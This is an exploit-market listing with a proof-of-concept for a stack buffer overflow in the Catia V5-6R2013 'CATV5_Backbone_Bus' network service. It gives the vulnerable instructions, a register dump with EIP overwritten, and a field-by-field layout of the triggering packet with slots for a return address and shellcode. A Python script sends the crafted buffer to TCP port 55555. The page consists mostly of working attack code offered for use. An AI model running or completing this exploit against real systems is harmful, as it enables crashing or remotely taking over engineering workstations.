[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Catia V5-6R2013 "CATV5_Backbone_Bus" - Stack Buffer Overflow

Author
Mohamed Shetta
Risk
[
Security Risk High
]
0day-ID
0day-ID-21927
Category
dos / poc
Date add
20-02-2014
Platform
windows
'''
#PORT: 55558 Or 55555

Vulnerable Code:
EAX contains the User Supplied data.
 
00406330 |> /8A08 /MOV CL,BYTE PTR DS:[EAX]
00406332 |. |880C02 |MOV BYTE PTR DS:[EDX+EAX],CL
00406335 |. |40 |INC EAX
00406336 |. |84C9 |TEST CL,CL
00406338 |.^\75 F6 \JNZ SHORT 00406330 ; CATSysDe.00406330
 
----------------------------------------------------------------------------------------------------------
Registers Dumb:
 
EAX 00000000
ECX FFB26363
EDX FFB28E70
EBX 00A5A7AA ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 00A5A630 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EBP 72106AE1 MSVCR90.strncmp
ESI 00A5A674 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EDI 00A5A678 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EIP 90909090
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit FFFAF000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0
EFL 00000212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
 
-------------------------------------------------------------------------------------------------------------
Triggering Packet Details:
 
(Packet) Details
 
(XXXX)Size of Next Data | (XXXX)Base for pointers, Set to zero for easy of exploitation. | (A*20)Junk | ("AppToBusInitMsg"+"\x00") Required String | (A*48)Junk | ("CATV5_Backbone_Bus"+"\x00")Required String | (B*49)Junk | (00000000)For Valid Message Sequence(0x00403C13) | (c*408)Junk | (XXXXXXXX)RetAdd | (c*357)small case to prevent converting shell code to small case | (Shell) Shell Code
 
-----------------------------------------------------------------------------------------------------------
Restrictions:
Only the most significant byte in the Return Address can be zero.




import socket
import struct
import ctypes
 
RetAdd="\x90\x90\x90\x90"
Shell="A" *1000
buff= "\x00\x00\x00\x00" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "A" * 48 + "CATV5_Backbone_Bus" +"\x00" + "B"* 49 + "\x00\x00\x00\x00" +"c"* 408 + RetAdd + "c"* 357 + Shell
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 55555))
s.send(struct.pack('>I',len(buff) ))
s.send(buff)

#  0day.today [2024-12-24]  #